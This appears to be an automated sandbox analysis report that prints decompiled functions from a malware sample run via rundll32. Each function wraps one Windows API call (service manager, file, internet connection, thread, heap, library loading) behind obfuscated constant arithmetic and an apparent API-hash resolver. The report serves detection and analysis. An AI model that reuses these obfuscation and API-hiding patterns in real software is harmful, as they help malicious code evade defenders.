                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoNativeSystem
                                                                                                        • String ID: |p
                                                                                                        • API String ID: 1721193555-2455131449
                                                                                                        • Opcode ID: 1373000f67fd09352ab480020baae7fa00b59f1f2ab89e5c019d1be64afd4c0b
                                                                                                        • Instruction ID: b9e8a9fce13a7fa4f55946634eaff8b1644946ae71f8be5b2788c33274e32d7b
                                                                                                        • Opcode Fuzzy Hash: 1373000f67fd09352ab480020baae7fa00b59f1f2ab89e5c019d1be64afd4c0b
                                                                                                        • Instruction Fuzzy Hash: AD2138B6D00309EFEB48DFA4C8468EEBBB4FB44314F108599E41566290D3B86B50CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EEFE9D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 26%
                                                                                                        			E04EEFE9D(void* __edx, intOrPtr _a4, intOrPtr _a8, int _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t34;
				void* _t41;
				void* _t43;

				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				E04EF2523(_t34);
				_v32 = 0xfebeef;
				_v28 = 0x6b4d4f;
				_v24 = 0;
				_v20 = 0x72d4d3;
				_v20 = _v20 + 0x7ce2;
				_v20 = _v20 ^ 0x0072d8bc;
				_v16 = 0x618a6;
				_v16 = _v16 + 0x2ac;
				_v16 = _v16 ^ 0x00083b16;
				_v12 = 0x17740f;
				_v12 = _v12 + 0x9d82;
				_v12 = _v12 ^ 0x0012bdfc;
				_v8 = 0xba692b;
				_v8 = _v8 ^ 0x31422697;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0005552e;
				_push(0x21ce39be);
				_push(0xb53dc03);
				_push(_t42);
				_push(_t42);
				_t43 = 0x15;
				E04ED2309(_t43);
				_t41 = OpenSCManagerW(0, 0, _a16); // executed
				return _t41;
			}














                                                                                                        0x04eefea4
                                                                                                        0x04eefea9
                                                                                                        0x04eefeaa
                                                                                                        0x04eefead
                                                                                                        0x04eefeb1
                                                                                                        0x04eefeb2
                                                                                                        0x04eefeb7
                                                                                                        0x04eefec1
                                                                                                        0x04eefec8
                                                                                                        0x04eefecb
                                                                                                        0x04eefed2
                                                                                                        0x04eefed9
                                                                                                        0x04eefee0
                                                                                                        0x04eefee7
                                                                                                        0x04eefeee
                                                                                                        0x04eefef5
                                                                                                        0x04eefefc
                                                                                                        0x04eeff03
                                                                                                        0x04eeff0a
                                                                                                        0x04eeff11
                                                                                                        0x04eeff18
                                                                                                        0x04eeff1c
                                                                                                        0x04eeff2f
                                                                                                        0x04eeff35
                                                                                                        0x04eeff3a
                                                                                                        0x04eeff3b
                                                                                                        0x04eeff3e
                                                                                                        0x04eeff3f
                                                                                                        0x04eeff4c
                                                                                                        0x04eeff52

                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,04EE5191,?,?,?,?,?,?,?,?,?,?,0EB411AB), ref: 04EEFF4C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ManagerOpen
                                                                                                        • String ID: OMk
                                                                                                        • API String ID: 1889721586-456170103
                                                                                                        • Opcode ID: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
                                                                                                        • Instruction ID: 0cbdef37f92f2299085e48b3d793f2a4cde293b01d7b6432bdfe1457f000f3fc
                                                                                                        • Opcode Fuzzy Hash: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
                                                                                                        • Instruction Fuzzy Hash: 061125B2C0021CBBEB11EFA5D90A8EFBFB4FF44318F108088E91466201D3B95B149F91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EE199D, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 58%
                                                                                                        			E04EE199D(void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				void* _t68;
				signed int _t69;
				signed int _t70;

				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E04EF2523(_t55);
				_v12 = 0xd4f63c;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xffffff46;
				_v12 = _v12 ^ 0xd4fb5fe8;
				_v8 = 0x967d18;
				_v8 = _v8 + 0xffffef98;
				_t69 = 0x14;
				_v8 = _v8 / _t69;
				_t70 = 0x4a;
				_v8 = _v8 / _t70;
				_v8 = _v8 ^ 0x000a0722;
				_v20 = 0x4653bc;
				_v20 = _v20 * 0x70;
				_v20 = _v20 ^ 0x1ec2604c;
				_v16 = 0x7577a9;
				_v16 = _v16 * 0x3c;
				_v16 = _v16 ^ 0x1b87e59a;
				E04ED2309(0x10a, _t70, _t70, 0xb484d458, _t70, 0x9c9047d0);
				_t68 = CreateFileW(_a4, _a24, _a28, 0, _a32, _a20, 0); // executed
				return _t68;
			}











                                                                                                        0x04ee19a6
                                                                                                        0x04ee19a7
                                                                                                        0x04ee19aa
                                                                                                        0x04ee19ad
                                                                                                        0x04ee19b0
                                                                                                        0x04ee19b3
                                                                                                        0x04ee19b6
                                                                                                        0x04ee19b9
                                                                                                        0x04ee19bc
                                                                                                        0x04ee19bf
                                                                                                        0x04ee19c3
                                                                                                        0x04ee19c4
                                                                                                        0x04ee19c9
                                                                                                        0x04ee19d3
                                                                                                        0x04ee19d9
                                                                                                        0x04ee19dd
                                                                                                        0x04ee19e4
                                                                                                        0x04ee19eb
                                                                                                        0x04ee19f2
                                                                                                        0x04ee19fe
                                                                                                        0x04ee1a03
                                                                                                        0x04ee1a0b
                                                                                                        0x04ee1a13
                                                                                                        0x04ee1a16
                                                                                                        0x04ee1a1d
                                                                                                        0x04ee1a30
                                                                                                        0x04ee1a38
                                                                                                        0x04ee1a3f
                                                                                                        0x04ee1a4a
                                                                                                        0x04ee1a4d
                                                                                                        0x04ee1a60
                                                                                                        0x04ee1a79
                                                                                                        0x04ee1a7f

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 04EE1A79
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
                                                                                                        • Instruction ID: 16681f1da8ce28d48f5fdf523cae9f8af1c5411dd50a2be847d6b1110bc89695
                                                                                                        • Opcode Fuzzy Hash: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
                                                                                                        • Instruction Fuzzy Hash: 6921E27280021DBBDF05DF95DC098DEBFB6EF49354F108188FA14662A0D3B69A61AF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EF30FB, Relevance: 1.6, APIs: 1, Instructions: 70networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 50%
                                                                                                        			E04EF30FB(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, void* _a24, intOrPtr _a32, intOrPtr _a36, signed int _a40, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t57;
				signed int _t58;
				short _t63;

				_t63 = _a40;
				_push(_a48);
				_push(0);
				_push(_t63 & 0x0000ffff);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E04EF2523(_t63 & 0x0000ffff);
				_a40 = 0x441dde;
				_a40 = _a40 | 0xef6c71fd;
				_a40 = _a40 + 0xffff46ca;
				_a40 = _a40 ^ 0xef65f1b7;
				_v16 = 0x4e992b;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0xa64ff1a5;
				_v12 = 0xdc7938;
				_t58 = 0x71;
				_v12 = _v12 / _t58;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x00369a6d;
				_v8 = 0xc2c26;
				_v8 = _v8 << 7;
				_v8 = _v8 << 3;
				_v8 = _v8 ^ 0x30b97202;
				E04ED2309(0x185, _t58, _t58, 0x3cfe7f69, _t58, 0xc0cf1a4);
				_t57 = InternetConnectW(_a24, _a4, _t63, 0, 0, _a16, 0, 0); // executed
				return _t57;
			}









                                                                                                        0x04ef3102
                                                                                                        0x04ef3106
                                                                                                        0x04ef310e
                                                                                                        0x04ef310f
                                                                                                        0x04ef3110
                                                                                                        0x04ef3113
                                                                                                        0x04ef3116
                                                                                                        0x04ef3117
                                                                                                        0x04ef311a
                                                                                                        0x04ef311d
                                                                                                        0x04ef3120
                                                                                                        0x04ef3123
                                                                                                        0x04ef3126
                                                                                                        0x04ef3129
                                                                                                        0x04ef312a
                                                                                                        0x04ef312b
                                                                                                        0x04ef3130
                                                                                                        0x04ef313a
                                                                                                        0x04ef3143
                                                                                                        0x04ef314a
                                                                                                        0x04ef3151
                                                                                                        0x04ef3158
                                                                                                        0x04ef315c
                                                                                                        0x04ef3163
                                                                                                        0x04ef316f
                                                                                                        0x04ef3177
                                                                                                        0x04ef317a
                                                                                                        0x04ef317e
                                                                                                        0x04ef3185
                                                                                                        0x04ef318c
                                                                                                        0x04ef3190
                                                                                                        0x04ef3194
                                                                                                        0x04ef31b4
                                                                                                        0x04ef31ca
                                                                                                        0x04ef31d1

                                                                                                        APIs
                                                                                                        • InternetConnectW.WININET(?,00369A6D,?,00000000,00000000,?,00000000,00000000), ref: 04EF31CA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ConnectInternet
                                                                                                        • String ID:
                                                                                                        • API String ID: 3050416762-0
                                                                                                        • Opcode ID: a94079c84f44fd79cf2d8e21410448fccbf556cf6765277f06ac4260a9b0b9f5
                                                                                                        • Instruction ID: e919e9d724556c816037478e0ae03beb10b6f5c2c8e145a9fe823fd83cba3ea5
                                                                                                        • Opcode Fuzzy Hash: a94079c84f44fd79cf2d8e21410448fccbf556cf6765277f06ac4260a9b0b9f5
                                                                                                        • Instruction Fuzzy Hash: 09214A76900108BBDF01CFA6CC49CDFBFB9EB89704F008189FA1466220C3759A20DFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EE38CA, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 55%
                                                                                                        			E04EE38CA(void* __ecx, intOrPtr _a8, _Unknown_base(*)()* _a12, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t44;
				void* _t54;
				signed int _t56;

				_push(_a40);
				_push(0);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E04EF2523(_t44);
				_v8 = 0x81d8e3;
				_v8 = _v8 | 0x29cc6377;
				_t56 = 0x4e;
				_v8 = _v8 / _t56;
				_v8 = _v8 + 0xffff28cb;
				_v8 = _v8 ^ 0x008a8115;
				_v20 = 0x37a592;
				_v20 = _v20 | 0x4431b854;
				_v20 = _v20 ^ 0x44318d0b;
				_v16 = 0x83d7ad;
				_v16 = _v16 | 0x0c5d9c08;
				_v16 = _v16 ^ 0x0cde7e94;
				_v12 = 0xac61ec;
				_v12 = _v12 + 0xffff443d;
				_v12 = _v12 * 0x13;
				_v12 = _v12 ^ 0x0cbd13a0;
				E04ED2309(0x347, _t56, _t56, 0x49f4d21, _t56, 0x9c9047d0);
				_t54 = CreateThread(0, 0, _a12, _a16, 0, 0); // executed
				return _t54;
			}










                                                                                                        0x04ee38d1
                                                                                                        0x04ee38d6
                                                                                                        0x04ee38d7
                                                                                                        0x04ee38da
                                                                                                        0x04ee38db
                                                                                                        0x04ee38de
                                                                                                        0x04ee38e1
                                                                                                        0x04ee38e4
                                                                                                        0x04ee38e7
                                                                                                        0x04ee38ea
                                                                                                        0x04ee38eb
                                                                                                        0x04ee38ed
                                                                                                        0x04ee38f2
                                                                                                        0x04ee38fc
                                                                                                        0x04ee390a
                                                                                                        0x04ee3912
                                                                                                        0x04ee3915
                                                                                                        0x04ee391c
                                                                                                        0x04ee3923
                                                                                                        0x04ee392a
                                                                                                        0x04ee3931
                                                                                                        0x04ee3938
                                                                                                        0x04ee393f
                                                                                                        0x04ee3946
                                                                                                        0x04ee394d
                                                                                                        0x04ee3954
                                                                                                        0x04ee3967
                                                                                                        0x04ee396f
                                                                                                        0x04ee3982
                                                                                                        0x04ee3994
                                                                                                        0x04ee399a

                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,44318D0B,?,00000000,00000000), ref: 04EE3994
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 4ee66b657200ea8511f1b49f91465a58aa226465ce330f2d495d8e9b8aa70771
                                                                                                        • Instruction ID: 6cad7958f6ce1f459addf2d10f36cdb3c73faba4698928c6f47ef78aff27cc8c
                                                                                                        • Opcode Fuzzy Hash: 4ee66b657200ea8511f1b49f91465a58aa226465ce330f2d495d8e9b8aa70771
                                                                                                        • Instruction Fuzzy Hash: 3621E271801219BBCF15DFE9DD4A8DFBFB9FF09214F108188E918A6160D3B19A259FA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04ED2985, Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 78%
                                                                                                        			E04ED2985(long __ecx, long __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t43;
				void* _t53;
				signed int _t55;
				long _t60;
				long _t61;

				_push(_a12);
				_t60 = __edx;
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04EF2523(_t43);
				_v20 = 0x610f25;
				_v20 = _v20 ^ 0x98bdb346;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x13199c72;
				_v16 = 0x24641b;
				_t55 = 0x72;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0xfebd96de;
				_v16 = _v16 ^ 0xf931a9e3;
				_v12 = 0x6331a9;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x0006f398;
				_v8 = 0x8145a8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 << 0xd;
				_v8 = _v8 + 0x8268;
				_v8 = _v8 ^ 0x0405b518;
				E04ED2309(_t55 + 0x5d, _t55, _t55, 0x9d19c04e, _t55, 0x9c9047d0);
				_t53 = RtlAllocateHeap(_a8, _t60, _t61); // executed
				return _t53;
			}












                                                                                                        0x04ed298d
                                                                                                        0x04ed2990
                                                                                                        0x04ed2992
                                                                                                        0x04ed2994
                                                                                                        0x04ed2997
                                                                                                        0x04ed299a
                                                                                                        0x04ed299b
                                                                                                        0x04ed299c
                                                                                                        0x04ed29a1
                                                                                                        0x04ed29ab
                                                                                                        0x04ed29b4
                                                                                                        0x04ed29b8
                                                                                                        0x04ed29bf
                                                                                                        0x04ed29cc
                                                                                                        0x04ed29d3
                                                                                                        0x04ed29d6
                                                                                                        0x04ed29dd
                                                                                                        0x04ed29e4
                                                                                                        0x04ed29eb
                                                                                                        0x04ed29f9
                                                                                                        0x04ed29fc
                                                                                                        0x04ed2a03
                                                                                                        0x04ed2a0a
                                                                                                        0x04ed2a0e
                                                                                                        0x04ed2a12
                                                                                                        0x04ed2a19
                                                                                                        0x04ed2a31
                                                                                                        0x04ed2a3e
                                                                                                        0x04ed2a45

                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(F931A9E3,01AD2A76,65B9EDAF,?,?,?,?,?,?,?,?,00000000,229292B5), ref: 04ED2A3E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
                                                                                                        • Instruction ID: c7b4aab3232ac6a4c85d8f6e716afb64ec441e75b33e7bcacd2ccd3671348fd1
                                                                                                        • Opcode Fuzzy Hash: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
                                                                                                        • Instruction Fuzzy Hash: D1213372D00209BBDF18DFA9D84A8DEBFB5FB41714F108098E825A6210E3B5AB55DF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EE7708, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04EE77B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 1029625771-0
                                                                                                        • Opcode ID: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
                                                                                                        • Instruction ID: ea6b2f8e3e791ca0a4a220a3a16ab935c6f250eaa40b2ca9ba6c30b4a355c581
                                                                                                        • Opcode Fuzzy Hash: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
                                                                                                        • Instruction Fuzzy Hash: FF1134B2D00209BBDB08DFA4C94A9AEBBB4FF44304F108189E914AB250E3B19B108F91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EEA566, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 87%
                                                                                                        			E04EEA566(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t31;
				int _t39;

				_push(_a4);
				_push(__ecx);
				E04EF2523(_t31);
				_v20 = 0xa80c31;
				_v20 = _v20 * 0x6c;
				_v20 = _v20 ^ 0x46e6f799;
				_v16 = 0x35d7e6;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0xbafefac0;
				_v12 = 0x55f9ae;
				_v12 = _v12 + 0xffffbfa6;
				_v12 = _v12 | 0xf8d2795e;
				_v12 = _v12 ^ 0xf8daa7f9;
				_v8 = 0xe46cfe;
				_v8 = _v8 ^ 0xeb94df75;
				_v8 = _v8 | 0xf69b0666;
				_v8 = _v8 ^ 0xfffa92dc;
				E04ED2309(0x148, __ecx, __ecx, 0x2237d547, __ecx, 0x9c9047d0);
				_t39 = FindCloseChangeNotification(_a4); // executed
				return _t39;
			}









                                                                                                        0x04eea56c
                                                                                                        0x04eea570
                                                                                                        0x04eea571
                                                                                                        0x04eea576
                                                                                                        0x04eea58a
                                                                                                        0x04eea58d
                                                                                                        0x04eea594
                                                                                                        0x04eea59b
                                                                                                        0x04eea59f
                                                                                                        0x04eea5a6
                                                                                                        0x04eea5ad
                                                                                                        0x04eea5b4
                                                                                                        0x04eea5bb
                                                                                                        0x04eea5c2
                                                                                                        0x04eea5c9
                                                                                                        0x04eea5d0
                                                                                                        0x04eea5d7
                                                                                                        0x04eea5f6
                                                                                                        0x04eea601
                                                                                                        0x04eea606

                                                                                                        APIs
                                                                                                        • FindCloseChangeNotification.KERNEL32(F8DAA7F9), ref: 04EEA601
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                        • String ID:
                                                                                                        • API String ID: 2591292051-0
                                                                                                        • Opcode ID: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
                                                                                                        • Instruction ID: 7bfd490b4f5f2ef6cb2bb7ac3d82527edfdde19325e83e07aa1c82cf6493d64d
                                                                                                        • Opcode Fuzzy Hash: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
                                                                                                        • Instruction Fuzzy Hash: 0911F7B5C1030DFBDB18DFE8D8469AEBBB4EF44304F108598A855A6260D3756B158F91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EE17CB, Relevance: 1.3, APIs: 1, Instructions: 56stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E04EE17CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E04EF2523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E04ED2309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}














                                                                                                        0x04ee17d2
                                                                                                        0x04ee17d5
                                                                                                        0x04ee17d7
                                                                                                        0x04ee17db
                                                                                                        0x04ee17dc
                                                                                                        0x04ee17e1
                                                                                                        0x04ee17e8
                                                                                                        0x04ee17f1
                                                                                                        0x04ee17f8
                                                                                                        0x04ee17ff
                                                                                                        0x04ee1803
                                                                                                        0x04ee1807
                                                                                                        0x04ee180e
                                                                                                        0x04ee181b
                                                                                                        0x04ee1822
                                                                                                        0x04ee1825
                                                                                                        0x04ee182c
                                                                                                        0x04ee1833
                                                                                                        0x04ee1844
                                                                                                        0x04ee1847
                                                                                                        0x04ee1859
                                                                                                        0x04ee185c
                                                                                                        0x04ee1863
                                                                                                        0x04ee186a
                                                                                                        0x04ee186e
                                                                                                        0x04ee1881
                                                                                                        0x04ee188d
                                                                                                        0x04ee1893

                                                                                                        APIs
                                                                                                        • lstrcmpiW.KERNEL32(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 04EE188D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 1586166983-0
                                                                                                        • Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
                                                                                                        • Instruction ID: f5300d26bccbc976f66e5f4b28cefeebba4601cd87e714554869e8bdf4187156
                                                                                                        • Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
                                                                                                        • Instruction Fuzzy Hash: B82124B5D0020DFFDB08DFA4C94A9EEBBB4EB44304F208189E525B7240E3B56B049FA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions